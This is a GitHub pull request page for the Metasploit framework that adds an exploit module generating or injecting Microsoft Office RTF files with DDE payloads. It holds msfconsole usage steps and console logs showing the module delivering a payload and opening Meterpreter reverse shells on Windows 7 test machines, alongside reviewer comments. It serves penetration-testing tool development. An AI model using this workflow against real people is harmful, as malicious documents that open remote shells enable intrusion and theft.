Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Office DDE RTF Generation & Injection #9282

Merged
merged 9 commits into from Dec 14, 2017
Merged

Office DDE RTF Generation & Injection #9282

merged 9 commits into from Dec 14, 2017

Conversation

ghost
Copy link

@ghost ghost commented Dec 7, 2017

In light of learning about RTF's, thought I'd revisit this PR #9120 and retry it. and YES! it worked haha

Module abuses a feature in MS Field Equations that allow an user to execute an arbitrary application.

Verification

List the steps needed to make sure this thing works

  1. Start msfconsole
  2. Do: use exploit/windows/fileformat/office_dde_delivery
  3. Do: set PAYLOAD [PAYLOAD]
  4. Do: run
msf > use exploit/windows/fileformat/office_dde_delivery
msf exploit(office_dde_delivery) > set FILENAME msf.rtf
FILENAME => /home/mumbai/file.rtf
msf exploit(office_dde_delivery) > set LHOST ens3
LHOST => ens3
msf exploit(office_dde_delivery) > set LPORT 35116
LPORT => 35116
msf exploit(office_dde_delivery) > run
[*] Using URL: http://0.0.0.0:8080/BUY0DYgc
[*] Local IP: http://192.1668.0.11:8080/BUY0DYgc
[*] Server started.
[*] Handling request for .sct from 192.168.0.24
[*] Delivering payload to 192.168.0.24...
[*] Sending stage (205379 bytes) to 192.168.0.24
[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217)

meterpreter > sysinfo
Computer        : TEST-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >

Austin added 2 commits December 6, 2017 21:41
Office DDE Payload Delivery
9d11c60 
Generate / Inject existing RTF files with DDE Payloads!
MS Office DDE Documentation
1e4b707
@wvu
Copy link
Contributor

wvu commented Dec 7, 2017

Congration

@ghost
Copy link
Author

ghost commented Dec 7, 2017
edited by ghost

Updated, fixed it up with default Options. DisablePayloadHandler FALSE DUH! haha

msf exploit(windows/fileformat/office_dde) > run

[*] Started HTTP reverse handler on http://-snip-:3511
[*] Using URL: http://0.0.0.0:3516/Ond0RaFJ
[*] Local IP: http://-snip-:3516/Ond0RaFJ
[*] Server started.
[+] msf.rtf stored at /root/.msf4/local/msf.rtf
[*] Handling request for .sct from -snip-
[*] Delivering payload to -snip-...
[*] http://-snip-:3511 handling request from -snip-; (UUID: wzojxigk) Staging x64 payload (206937 bytes) ...
[*] Meterpreter session 4 opened (-snip:3511 -> -snip-:50179) at 2017-12-07 13:45:19 -0500
^C[-] Exploit failed: Interrupt
[*] Server stopped.
msf exploit(windows/fileformat/office_dde) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > id
[-] Unknown command: id.
meterpreter > sysinfo
Computer        : AUSTIN-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > migrate -h
--snip--

@ghost
Copy link
Author

ghost commented Dec 7, 2017

annd injecting...

msf exploit(windows/fileformat/office_dde) > set FILENAME pendelum.rtf
FILENAME => pendelum.rtf
msf exploit(windows/fileformat/office_dde) > set FOLDER_PATH /tmp
FOLDER_PATH => /tmp
msf exploit(windows/fileformat/office_dde) > run

[*] Started reverse TCP handler on -snip-:35116
[*] Using URL: http://0.0.0.0:3516/BhTWvCIJHs
[*] Local IP: http://-snip-:3516/BhTWvCIJHs
[*] Server started.
[*] Injecting /tmp/pendelum.rtf...
[+] pendelum.rtf stored at /root/.msf4/local/pendelum.rtf
[*] Handling request for .sct from -snip-
[*] Delivering payload to -snip-..
[*] Sending stage (179779 bytes) to -snip-
[*] Meterpreter session 10 opened (-snip-:35116 -> -snip-:50786) at 2017-12-07 14:35:11 -0500

@ghost
Copy link
Author

ghost commented Dec 13, 2017

I'll attempt to include docx injection, no guarantees though that I'm able to do it.

@wchen-r7 wchen-r7 self-assigned this Dec 13, 2017
@wchen-r7 wchen-r7 self-requested a review December 13, 2017 19:17
@wchen-r7
Copy link
Contributor

@realoriginal The template injection is nice to have, but not required. When the Office macro exploit was first published, it didn't support template injection, either :-)

@ghost
Copy link
Author

ghost commented Dec 13, 2017

Haha :D Yeah, I'm trying to get it, by basing it off that one you made, having some issues unfortunately, I guess wrapping my head around the parsing with Nokogiri + zipping those files back together hilariously.

@wchen-r7
Copy link
Contributor

Works as advertised:

msf exploit(windows/fileformat/office_dde_delivery) > run

[*] Started reverse TCP handler on 172.16.85.1:4444 
[*] Using URL: http://172.16.85.1:8080/PY25sEyYUu
[*] Server started.
[+] msf.rtf stored at /Users/wchen/.msf4/local/msf.rtf
[*] Handling request for .sct from 172.16.85.134
[*] Delivering payload to 172.16.85.134...
[*] Sending stage (179779 bytes) to 172.16.85.134
[*] Meterpreter session 1 opened (172.16.85.1:4444 -> 172.16.85.134:49160) at 2017-12-13 18:14:28 -0600

@wchen-r7 wchen-r7 merged commit 900f7d6 into rapid7:master Dec 14, 2017
wchen-r7 added a commit that referenced this pull request Dec 14, 2017
@wchen-r7
Bring #9282 up to date with upstream-master
b99663f
wchen-r7 added a commit that referenced this pull request Dec 14, 2017
@wchen-r7
Land #9282, Add exploit for MSFT Office DDR in RTF format
cfec0f4 
Land #9282
@wchen-r7
Copy link
Contributor

Release Notes

This module generates a Microsoft Office RTF document with a malicious DDE payload.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@wchen-r7 wchen-r7 Awaiting requested review from wchen-r7

Assignees

@wchen-r7 wchen-r7

Labels
module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@wvu @wchen-r7 @tdoan-r7 @jmartin-tech